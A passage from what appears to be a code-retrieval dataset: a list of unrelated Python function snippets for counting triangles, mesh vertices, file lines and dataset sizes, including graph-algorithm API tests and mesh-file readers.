t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def test_triangle_count_05(self):\n body = {\"direction\": \"IN\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_08(self):\n body = {\"direction\": \"IN\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_in': 13, 'vertices_in': 9, 'triangles': 0}\n else:\n assert 0", "def test_triangle_count_04(self):\n body = {\"direction\": \"OUT\"}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def test_triangle_count_06(self):\n body = {\"direction\": \"OUT\", \"degree\": -1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 2}\n else:\n assert 0", "def countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def countDataSize(self,filename):\n \n d = h5py.File(filename,'r')\n features = d['spectrometer/features'][:]\n select = self.selectData(features.astype(float), self.ifeature, d)\n N = len(features[select])\n d.close()\n\n N = (N//self.offsetLen) * self.offsetLen\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def data_info(data):\n filename = data[\"filename\"]\n X_var = data[\"X_var\"]\n Y_var = data[\"Y_var\"]\n X,Y = read_file(filename,X_var,Y_var)\n input_dim = len(X_var)\n output_dim = len(Y_var)\n return X,Y,input_dim,output_dim", "def count_aux(self, infile):\n n_aux = 0\n n_tokens = 0\n dgs_in = self._file_handler.file_to_dg_list(infile)\n for dg in dgs_in:\n n_tokens += len(dg)\n transform = VGtransformer(dg, dep_style=self._dep_style)\n transform.transform()\n n_aux += transform.tot_aux\n return n_aux, n_tokens, len(dgs_in)", "def read_datafile(shower_name):\n\twith open(datafile_dir+'datafile_'+shower_name) as file:\n\t\tamplitudes = [float(line) for line in file]\n\tcount = [x+1 for x in range(len(amplitudes))[::-1]]\n\treturn amplitudes, count", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def create_1d_coil_geometry(division, filename, directory):\n os.chdir(directory)\n npoints = division + 1\n length_array = np.zeros((npoints, 2))\n current_length = 0\n array = np.loadtxt(filename)\n for i in range(1, npoints):\n current_length += ((array[i, 1] - array[i - 1, 1]) ** 2 + (array[i, 2] - array[i - 1, 2]) ** 2 +\n (array[i, 3] - array[i - 1, 3]) ** 2) ** 0.5\n length_array[i - 1, 0] = i\n length_array[i, 1] = current_length\n length_array[npoints - 1, 0] = npoints\n return length_array", "def load_data():\n data = []\n with euler.Resource('triangle.txt') as datafile:\n for line in datafile.readlines():\n data.insert(0, map(int, line.strip().split()))\n return data", "def test_triangle_count_07(self):\n body = {\"direction\": \"OUT\", \"degree\": 1}\n code, res = Algorithm().post_triangle_count(body, auth=auth)\n id = res[\"task_id\"]\n if id > 0:\n result = get_task_res(id, 120, auth=auth)\n print(result)\n assert result == {'edges_out': 13, 'vertices_out': 7, 'triangles': 0}\n else:\n assert 0", "def read_input(filename):\n with open(filename, 'r') as f:\n (N) = map(int, next(f).split())\n def parse_line(line):\n l = line.split()\n h = 0 if l[0] == 'H' else 1\n n = int(l[1])\n return [h, l[2:]]\n\n photos = transform_strings([parse_line(line) for line in f])\n return (len(photos), photos)", "def get_edge_lengths(points: np.ndarray, triangles: np.ndarray) -> np.ndarray:\n edges, _ = get_edges(triangles)\n return np.linalg.norm(np.diff(points[edges], axis=1), axis=2).squeeze()", "def dimension(self):\r\n a = 0\r\n for x in self.faces():\r\n if (len(x) > a):\r\n a = len(x) \r\n return a-1", "def count_timepoints(sc, session, files):\n tuples = zip(range(len(files)), files)\n files_sc = sc.parallelize(tuples)\n\n def count_planes(kv):\n index, path2 = kv\n try:\n from ScanImageTiffReader import ScanImageTiffReader\n img = ScanImageTiffReader(path2).data()\n except Exception:\n import tifffile\n img = tifffile.imread(path2)\n return img.shape[0]\n\n data2 = files_sc.map(count_planes).collect()\n frame_numbers = np.array(data2)\n vol_numbers = frame_numbers / len(session.fieldMask)\n return vol_numbers.astype(int)", "def countsubcatchments(inputfilename=FileSettings.settingsdict['inputfilename']):\r\n global count\r\n with open(inputfilename, 'r') as swmmput:\r\n contents = swmmput.readlines()\r\n count = len(contents)\r\n return(count)", "def read_off_size(path):\n try:\n with open(path, 'r') as file:\n lines = file.readlines()\n if lines[0] != 'OFF\\n':\n print(path, 'Error: is not an .off file')\n num_vertices, num_faces = tuple(lines[1].split()[:2])\n return int(num_vertices), int(num_faces)\n except IOError:\n print('Error: Failed reading file:', path)", "def num_quadrature_points(self) -> int:", "def findTriangles(p):\n triangleCount = 0\n for a in range(3, p//3 + 1):\n for b in range(a+1, p//2):\n c = p - (a+b)\n if (a**2 + b**2) == c**2:\n triangleCount += 1\n return triangleCount", "def get_dimensions ( file_in, separator ) :\n try :\n logger.info ( \"Extract dimensions from xyz file \" + str(file_in) ) \n d = {}\n first_row = True\n d[NOPS] = 0\n file = open(file_in, 'r')\n for line in file :\n d[NOPS] = d[NOPS] + 1\n l = line.rstrip().split(separator)\n x = float(l[0])\n y = float(l[1])\n z = float(l[2])\n if first_row :\n d[MINX] = x\n d[MAXX] = x\n d[MINY] = y\n d[MAXY] = y\n d[MINZ] = z\n d[MAXZ] = z\n first_row = False\n else :\n if x < d[MINX] :\n d[MINX] = x\n if x > d[MAXX] :\n d[MAXX] = x \n if y < d[MINY] :\n d[MINY] = y\n if y > d[MAXY] :\n d[MAXY] = y \n if z < d[MINZ] :\n d[MINZ] = z\n if z > d[MAXZ] :\n d[MAXZ] = z \n file.close() \n logger.info ('Now return')\n return d\n except Exception, err:\n logger.critical(\"Extract dimensions from xyz file failed: ERROR: %s\\n\" % str(err))\n raise", "def reader(filename,only_length=False):\n print(\"Counting lines in file %s\"%filename)\n total_lines=0\n for n,line in enumerate(open(filename,\"r\")):\n total_lines+=1\n \n if only_length:\n return total_lines\n \n X,Y,Z,W,J=[np.zeros(total_lines) for _ in range(5)]\n \n for n, line in enumerate(open(filename, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d from file %s\" %(n,total_lines,filename))\n split_line=np.array(line.split(\" \"), dtype=float) \n X[n]=split_line[0];\n Y[n]=split_line[1];\n Z[n]=split_line[2];\n W[n]=split_line[3];\n J[n]=int(split_line[4]);\n return X,Y,Z,W,J", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def calc_side_lengths(triangles):\n first_vec = [2, 0, 1]\n second_vec = [1, 2, 0]\n sides = triangles[:, first_vec] - triangles[:, second_vec]\n lengths = np.sqrt(np.sum(sides**2, axis=2))\n return lengths", "def numverts(self):\n return self._numvertstotal", "def readGR3File(inputFilename):\n print 'Reading ' + inputFilename + ' ...'\n infile = open(inputFilename, 'r')\n description = infile.readline().strip() # remove leading/trailing whitespace\n tmpStr = infile.readline()\n nTriangles, nNodes = (int(s) for s in tmpStr.split())\n print ' nTriangles={0:d} nNodes={1:d}'.format(nTriangles, nNodes)\n\n # nodes\n nodeArray = readNodeBlock(infile, nNodes)\n nodenum = np.array(nodeArray[:, 0].flatten(), dtype=int)\n nodexyz = np.zeros((nNodes, 3))\n nodexyz[:, :2] = nodeArray[:, 1:3]\n nodalValues = nodeArray[:, 3]\n\n print ' Nodal values min={0:g} max={1:g}'.format(min(nodalValues), max(nodalValues))\n\n # triangular elements\n triArray = readElemBlock(infile, nTriangles)\n\n trinum = triArray[:, 0].flatten()\n tritype = triArray[0, 1]\n trinodes = triArray[:, -3:] - 1 # three last columns, 0-based indexing\n #triangles = meshElements(trinodes,trinum,tritype)\n\n x = nodexyz[:, 0]\n y = nodexyz[:, 1]\n\n tmpStr = infile.readline()\n boundaries = []\n if len(tmpStr) > 0:\n # boundary information, if not end of file\n nOpenBndSegments = int(tmpStr.split()[0])\n nOpenBndNodesTot = int(infile.readline().split()[0])\n print ' nOpenBndSegments={0:d} nOpenBndNodesTot={1:d}'.format(nOpenBndSegments, nOpenBndNodesTot)\n for iBnd in range(nOpenBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n tag = bndHeader[-1]\n if tag.isdigit():\n tag = 'open' + tag\n print ' open bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary('open', tag, nodes))\n nLandBndSegments = int(infile.readline().split()[0])\n nLandBndNodesTot = int(infile.readline().split()[0])\n landBndTags = range(\n nOpenBndSegments + 1,\n nOpenBndSegments + nLandBndSegments + 1)\n print ' nLandBndSegments={0:d} nLandBndNodesTot={1:d}'.format(nLandBndSegments, nLandBndNodesTot)\n for iBnd in range(nLandBndSegments):\n bndHeader = infile.readline().split()\n nBndNodes = int(bndHeader[0])\n try:\n landType = int(bndHeader[1])\n except:\n print \"\"\"Land boundary type missing in gr3 file. Add 0/1 (land/island) after number of nodes in each land boudary, e.g.\n 1002 = Total number of closed boundary nodes\n 501 0 = Number of nodes in closed boundary 1\"\"\"\n raise Exception(\n 'Could not parse land boundary type (0/1 - land/island)\\n')\n landType = 'island' if landType == 1 else 'land'\n tag = landType + bndHeader[-1]\n print ' land bnd {0:d} {1:s}: {2:d} nodes'.format(iBnd + 1, tag, nBndNodes)\n tmpList = []\n for iN in range(nBndNodes):\n tmpList.append(int(infile.readline()))\n #tmpList = fromfile(infile,dtype=int,count=nBndNodes,sep=' ')\n nodes = np.array(tmpList, dtype=int) - 1\n boundaries.append(meshContainer.meshBoundary(landType, tag, nodes))\n\n infile.close()\n\n # for better interpolation, round coordinates to 1e-4\n nDig = 4\n x = np.round(x, nDig)\n y = np.round(y, nDig)\n\n return x, y, nodalValues, trinodes, boundaries, description", "def file_read(file_name):\n \n #open specified file in read mode\n in_file = open(file_name, \"r\")\n \n #create data lists\n sp_length_v3 = []\n sp_period_v3 = [] \n\n #save header to string and split into list\n header_string = in_file.readline()\n header_v3 = header_string.split()\n \n #save revelent data to respective lists\n for line in in_file:\n values = line.split()\n sp_length_v3.append(float(values[1]))\n sp_period_v3.append(float(values[2]))\n \n #close the file\n in_file.close()\n \n #return 3D lists of lists containing data\n ans = [sp_length_v3, sp_period_v3, header_v3]\n \n return ans", "def from_polyfile(name):\n\n from anuga.utilities.numerical_tools import anglediff\n from math import pi\n import os.path\n root, ext = os.path.splitext(name)\n\n if ext == 'poly':\n filename = name\n else:\n filename = name + '.poly'\n\n\n fid = open(filename)\n\n points = [] #x, y\n values = [] #z\n ##vertex_values = [] #Repeated z\n triangles = [] #v0, v1, v2\n\n lines = fid.readlines()\n\n keyword = lines[0].strip()\n msg = 'First line in .poly file must contain the keyword: POINTS'\n assert keyword == 'POINTS', msg\n\n offending = 0\n i = 1\n while keyword == 'POINTS':\n line = lines[i].strip()\n i += 1\n\n if line == 'POLYS':\n keyword = line\n break\n\n fields = line.split(':')\n assert int(fields[0]) == i-1, 'Point indices not consecutive'\n\n #Split the three floats\n xyz = fields[1].split()\n\n x = float(xyz[0])\n y = float(xyz[1])\n z = float(xyz[2])\n\n points.append([x, y])\n values.append(z)\n\n\n k = i\n while keyword == 'POLYS':\n line = lines[i].strip()\n i += 1\n\n if line == 'END':\n keyword = line\n break\n\n\n fields = line.split(':')\n assert int(fields[0]) == i-k, 'Poly indices not consecutive'\n\n #Split the three indices\n vvv = fields[1].split()\n\n i0 = int(vvv[0])-1\n i1 = int(vvv[1])-1\n i2 = int(vvv[2])-1\n\n #Check for and exclude degenerate areas\n x0 = points[i0][0]\n y0 = points[i0][1]\n x1 = points[i1][0]\n y1 = points[i1][1]\n x2 = points[i2][0]\n y2 = points[i2][1]\n\n area = abs((x1*y0-x0*y1)+(x2*y1-x1*y2)+(x0*y2-x2*y0))/2\n if area > 0:\n\n #Ensure that points are arranged in counter clock-wise order\n v0 = [x1-x0, y1-y0]\n v1 = [x2-x1, y2-y1]\n v2 = [x0-x2, y0-y2]\n\n a0 = anglediff(v1, v0)\n a1 = anglediff(v2, v1)\n a2 = anglediff(v0, v2)\n\n\n if a0 < pi and a1 < pi and a2 < pi:\n #all is well\n j0 = i0\n j1 = i1\n j2 = i2\n else:\n #Swap two vertices\n j0 = i1\n j1 = i0\n j2 = i2\n\n triangles.append([j0, j1, j2])\n ##vertex_values.append([values[j0], values[j1], values[j2]])\n else:\n offending +=1\n\n log.critical('Removed %d offending triangles out of %d'\n % (offending, len(lines)))\n return points, triangles, values", "def n_file_elements(cls):\n \n return randint(1, (3 * Root.size))", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def get_triangle_count(remote, objectid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleCount(objectid)\n remote.runCommand(cmd1)\n result_val = mmapi.any_result()\n cmd1.GetSceneCommandResult_GetTriangleCount(key1, result_val)\n return result_val.i", "def get_dimensions(self):\r\n x = []\r\n y = []\r\n z = []\r\n for i in self.verts:\r\n x.append(i[0])\r\n y.append(i[1])\r\n z.append(i[2])\r\n\r\n x.append(abs(min(x)))\r\n y.append(abs(min(y)))\r\n z.append(abs(min(z)))\r\n\r\n return max(x), max(y), max(z)", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def std_triangles_count(graph):\n if nx.is_directed(graph):\n raise Exception(\"Graph is not undirected\")\n\n return sum(nx.triangles(graph).values()) // 3", "def getNbins(self,axis,includeTotalBin = True):\n\n\t\tif axis == \"f\":\n\t\t\tnCells = 1 if self.nCells == 0 else self.nCells\n\t\t\treturn nCells\n\n\t\tif axis == \"i\":\n\t\t\treturn self.meshInfo[1]\n\n\t\tif axis == \"j\":\n\t\t\treturn self.meshInfo[2]\n\n\t\tif axis == \"k\":\n\t\t\treturn self.meshInfo[3]\n\n\t\tif axis == \"d\":\n\t\t\tnDir = 1 if self.nDir == 0 else self.nDir\n\t\t\treturn nDir\n\n\t\tif axis == \"u\":\n\t\t\tnUsr = 1 if self.nUsr == 0 else self.nUsr\n\t\t\tnUsr = nUsr - 1 if self.usrTC == \"t\" and not includeTotalBin else nUsr\n\t\t\treturn nUsr\n\n\t\tif axis == \"s\":\n\t\t\tnSeg = 1 if self.nSeg == 0 else self.nSeg\n\t\t\tnSeg = nSeg - 1 if self.segTC == \"t\" and not includeTotalBin else nSeg\n\t\t\treturn nSeg\n\n\t\tif axis == \"m\":\n\t\t\tnMul = 1 if self.nMul == 0 else self.nMul\n\t\t\tnMul = nMul - 1 if self.mulTC == \"t\" and not includeTotalBin else nMul\n\t\t\treturn nMul\n\n\t\tif axis == \"c\":\n\t\t\tnCos = 1 if self.nCos == 0 else self.nCos\n\t\t\tnCos = nCos - 1 if self.cosTC == \"t\" and not includeTotalBin else nCos\n\t\t\treturn nCos\n\n\t\tif axis == \"e\":\n\t\t\tnErg = 1 if self.nErg == 0 else self.nErg\n\t\t\tnErg = nErg - 1 if self.ergTC == \"t\" and not includeTotalBin else nErg\n\t\t\treturn nErg\n\n\t\tif axis == \"t\":\n\t\t\tnTim = 1 if self.nTim == 0 else self.nTim\n\t\t\tnTim = nTim - 1 if self.timTC == \"t\" and not includeTotalBin else nTim\n\t\t\treturn nTim", "def read_txt(if_name):\n n = 0\n paper_shape = []\n present_shape = []\n input_file = open(if_name,'r')\n i = 0\n\n for line in input_file:\n\n if i > 1:\n\n i += 1\n line = line.strip().split(' ')\n if len(line) < 2:\n break\n present_shape.append([int(e) for e in line])\n\n if i == 1:\n i += 1\n line = line.strip()\n n = int(line)\n\n if i == 0:\n i += 1\n line = line.strip().split(' ')\n paper_shape = [int(e) for e in line]\n\n input_file.close()\n return n, paper_shape, present_shape", "def bpCount(file):\n amount_bp = len(file)\n return amount_bp", "def get_all_object_triangles( filename, scale , translation=(0,0,0)):\n import warnings\n warnings.warn(\"@PendingDeprecationWarning\", PendingDeprecationWarning)\n vertexObjs = read_vertices_objects( filename )\n faceObjs = read_faces_objects( filename )\n\n r = []\n j = 0\n \n # Validation:\n vertices, faces = [],[]\n for obj in range(len(vertexObjs)):\n vertices += vertexObjs[obj]\n faces += faceObjs[obj]\n max_vertex_index = max([max(x) for x in faces])\n if len(vertices) != max_vertex_index:\n logging.warning( \"ParseWarning: A face's vertex index number is does not match the quantity of read vertices.\" )\n logging.warning( \"Qty of Vertices: \"+str(len(vertices))+\", Largest Face Index: \"+str(max_vertex_index) )\n\n # Parse as Tris:\n for obj in range(len(vertexObjs)):\n vertices = vertexObjs[obj]\n faces = faceObjs[obj]\n r.append([])\n c = 0\n for f in faces: # for every face\n for i in f: # for each index point in face\n c+=1\n try:\n # Get the face[i] vertex\n v = vertices[i-1]\n except IndexError as indErr:\n logging.warning(\"IndexError: Attempted to access index: \"+str(i-1)+\" in list of length: \"+str(len(vertices)))\n raise IndexError\n # Scale the face[i] vertex\n scV = [v[0]*scale, v[1]*scale, v[2]*scale]\n # Translate the scaled face vertex:\n t = translation\n tmpv = [scV[0]+t[0],scV[1]+t[1], scV[2]+t[2]]\n # Retain this vertex\n r[j].append(tmpv)\n # ---------------------\n if c % 3 == 0:\n j+=1\n r.append([])\n r = r[:len(r)-1] # remove the final empty list.\n\n checkShapeValidity( r )\n return r", "def load_triangles(triangle_bytes, header):\n triangles = list()\n for i in range(header.num_tris):\n triangle = triangle_t(list(struct.unpack(\"<hhh\", triangle_bytes[12*i:12*i+6])), list(struct.unpack(\"<hhh\", triangle_bytes[12*i+6:12*i+12])))\n # print(triangle)\n triangles.append(triangle)\n return triangles", "def test_number_of_surface_objects(self):\n for O in self.mod.objts.itervalues():\n no_of_surfaces = 0\n for C in O.conts.itervalues():\n if C.surf != 0:\n no_of_surfaces += 1\n self.assertEqual(O.surfsize, no_of_surfaces)", "def dimensions():", "def test_number_of_vertex_elements_in_MESH_chunk(self):\n for O in self.mod.objts.itervalues():\n for M in O.meshes.itervalues():\n self.assertEqual(M.vsize, len(M.vert))", "def read_triangle(f, layers=1):\n # Read nodes\n with open(f + '.node') as h:\n num_nodes = int(h.readline().split(' ')[0])\n node_values = np.zeros((num_nodes, 2), dtype=np.float64)\n for line in h:\n if line[0] == '#':\n continue\n node, x, y = line.split()[:3]\n node_values[int(node) - 1, :] = [float(x), float(y)]\n\n nodes = op2.Set(num_nodes, \"nodes\")\n coords = op2.Dat(nodes ** 2, node_values, name=\"coords\")\n\n # Read elements\n with open(f + '.ele') as h:\n num_tri, nodes_per_tri, num_attrs = [int(x) for x in h.readline().split()]\n map_values = np.zeros((num_tri, nodes_per_tri), dtype=np.int32)\n for line in h:\n if line[0] == '#':\n continue\n vals = [int(x) - 1 for x in line.split()]\n map_values[vals[0], :] = vals[1:nodes_per_tri + 1]\n\n elements = op2.Set(num_tri, \"elements\", layers=layers)\n elem_node = op2.Map(elements, nodes, nodes_per_tri, map_values, \"elem_node\")\n\n return nodes, coords, elements, elem_node", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def __len__(self) -> int:\n import h5py\n\n with h5py.File(\n os.path.join(self.root, self.data_dir, self.img_file_name), \"r\"\n ) as f:\n num_datapoints: int = f[self.split][\"pv_log\"].shape[0]\n\n return num_datapoints", "def get_library_sizes(args):\n with open(args.counts, \"r\") as counts:\n sizes = []\n head = True\n for line in counts:\n line = line.strip()\n if head:\n head = False\n samples = line.split(\"\\t\")[3:]\n total_counts = [0] * len(samples)\n else:\n counts = line.split(\"\\t\")\n if counts[1] == \"NA\":\n break\n else:\n counts = counts[3:]\n for i in range(len(counts)):\n total_counts[i] += int(counts[i])\n\n for i in range(len(samples)):\n sizes.append([samples[i], total_counts[i]])\n\n return sizes", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def getFileCount(self) -> int:\n ...", "def test_number_of_MESH_chunks(self):\n for O in self.mod.objts.itervalues():\n self.assertEqual(O.meshsize, len(O.meshes))", "def _tvb_surface_to_tri(self, surface_file_name):\n surface_file_path = os.path.join(OM_STORAGE_DIR, surface_file_name)\n\n #TODO: check file doesn't already exist\n LOG.info(\"Writing TVB surface to .tri file: %s\" % surface_file_path)\n file_handle = file(surface_file_path, \"a\")\n\n file_handle.write(\"- %d \\n\" % self.sources.number_of_vertices)\n verts_norms = numpy.hstack((self.sources.vertices, \n self.sources.vertex_normals))\n numpy.savetxt(file_handle, verts_norms)\n\n tri_str = \"- \" + (3 * (str(self.sources.number_of_triangles) + \" \")) + \"\\n\"\n file_handle.write(tri_str)\n numpy.savetxt(file_handle, self.sources.triangles, fmt=\"%d\")\n\n file_handle.close()\n LOG.info(\"%s written successfully.\" % surface_file_name)\n\n return surface_file_path", "def dataDimensions(data):\n logging.info('Number of rows of data: %s' % len(data))\n logging.info('Number of columns of data: %s' % len(data[1]))", "def _extract_track_lengths(track_key,conn):\n print track_key\n \n (fname,iden_key,track_key) = conn.execute(\"select fout,iden_key,comp_key from tracking where comp_key = ?\",\n track_key).fetchone()\n \n F = h5py.File(fname,'r')\n len_vec = F[fd('tracking',track_key)]['length'][:]\n \n temp = 0\n dtime = 0\n fr_count = 0\n for g in F.keys():\n if g[0:5] == 'frame':\n temp += F[g].attrs['temperature']\n dtime += F[g].attrs['dtime']\n fr_count += 1\n\n \n F.close()\n del F\n return len_vec, temp/fr_count, dtime/fr_count", "def ss_triangle_count(graph: ScipyGraph) -> int:\n props = ScipyGraph.Type.compute_abstract_properties(graph, {\"edge_type\"})\n if props[\"edge_type\"] == \"map\":\n # Drop weights before performing triangle count\n m = graph.value.copy()\n m.data = np.ones_like(m.data)\n elif props[\"edge_type\"] == \"set\":\n m = graph.value\n L = ss.tril(m, k=-1).tocsr()\n U = ss.triu(m, k=1).tocsc()\n return int((L @ U.T).multiply(L).sum())", "def analyze_pressure_dump(filename, Lx=200., Ly=200, Lz=900., N=10, bin_divide_flag=False, Natoms=113579):\n myfile = open(filename+'.txt')\n trajectory = []\n traj_pd = []\n frames = []\n\n for _ in range(3):\n next(myfile)\n count = 0\n while EOF(myfile):\n count += 1\n s = next(myfile) # info with the time step\n\n x = np.zeros(N, dtype=[('Chunk',np.float32), ('Coord1',np.float32), ('Ncount',np.float32), ('density',np.float32), ('temp',np.float32), ('vx',np.float32), ('fx',np.float32),('c_pciKE[1]',np.float32), ('c_pciKE[2]',np.float32), ('c_pciKE[3]',np.float32), ('c_pciVIR[1]',np.float32), ('c_pciVIR[2]',np.float32), ('c_pciVIR[3]',np.float32), ('c_pgelELAS[1]',np.float32), ('c_pgelELAS[2]',np.float32), ('c_pgelELAS[3]',np.float32), ('c_pgelVIR[1]', np.float32), ('c_pgelVIR[2]', np.float32), ('c_pgelVIR[3]', np.float32), ('c_pgelPAIR[1]', np.float32), ('c_pgelPAIR[2]', np.float32), ('c_pgelPAIR[3]', np.float32)])\n\n# Chunk Coord1 Ncount density/number temp vx fx c_pciKE[1] c_pciKE[2] c_pciKE[3] c_pciVIR[1] c_pciVIR[2] c_pciVIR[3] c_pgelELAS[1] c_pgelELAS[2] c_pgelELAS[3] c_pgelVIR[1] c_pgelVIR[2] c_pgelVIR[3] c_pgelPAIR[1] c_pgelPAIR[2] c_pgelPAIR[3]\n\n list_line = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", s)\n frame, _, _ = list_line\n frames.append(int(frame))\n # print( \"reading lines\")\n\n for i in xrange(N):\n count += 1\n s = next(myfile)\n list_line = re.findall(\"[-+]?\\d+[\\.]?\\d*[eE]?[-+]?\\d*\", s)\n # print( \"reading line\", i, list_line)\n for il, l in enumerate(list_line):\n x[i][il] = float(l)\n\n trajectory.append(x)\n\n # names = x.dtype.fields.keys()\n # data = x.dtype.fields.values()\n\n df = pd.DataFrame.from_records(x)\n traj_pd.append(df)\n\n myfile.close()\n\n\n\n # # volume = 218.*44.*44.\n volume = Lx*Ly*Lz\n # N_atoms = 113579\n # if bin_divide_flag:\n # bin_volume = volume / float(N)\n # else:\n # bin_volume = 1.\n\n bin_volume = volume / float(N)\n # bin_volume = volume\n # bin_volume /= float(Natoms)\n\n Combine_PD = pd.concat(traj_pd)\n FINAL_PD = pd.DataFrame()\n\n FINAL_PD['Coord1'] = Combine_PD['Coord1']\n FINAL_PD['p_ciKE'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pciKE[1]'] + Combine_PD['c_pciKE[2]'] + Combine_PD['c_pciKE[3]'])/(3.*bin_volume)\n FINAL_PD['p_ciVIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pciVIR[1]'] + Combine_PD['c_pciVIR[2]'] + Combine_PD['c_pciVIR[3]'])/(3.*bin_volume)\n FINAL_PD['p_gelELAS'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelELAS[1]'] + Combine_PD['c_pgelELAS[2]'] + Combine_PD['c_pgelELAS[3]'])/(3.*bin_volume)\n\n FINAL_PD['p_gelVIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelVIR[1]'] + Combine_PD['c_pgelVIR[2]'] + Combine_PD['c_pgelVIR[3]'])/(3.*bin_volume)\n FINAL_PD['p_gelPAIR'] = -1 * Combine_PD['Ncount'] * (Combine_PD['c_pgelPAIR[1]'] + Combine_PD['c_pgelPAIR[2]'] + Combine_PD['c_pgelPAIR[3]'])/(3.*bin_volume)\n\n # So now I have to\n # P_bin = (sigma_per_atom_xx + ... + sigma_per_atom_zz)/(bin_volume*3)\n # *N_atoms_per_bin\n # N_atoms_per_bin = number_density*N_atoms\n\n\n df_concat = FINAL_PD\n\n by_row_index = df_concat.groupby(df_concat.index)\n df_means = by_row_index.mean()\n by_row_index_2 = df_concat.groupby(df_concat.index)\n df_stds = by_row_index_2.std()\n\n # print( df_means.head())\n # print( df_stds.head())\n return df_means, df_stds", "def fileCount(self):\n pass", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def _ReadExtent(self):\n # Read the mesh file as line strings, remove lines with comment = !\n v = np.array(np.__version__.split('.')[0:2], 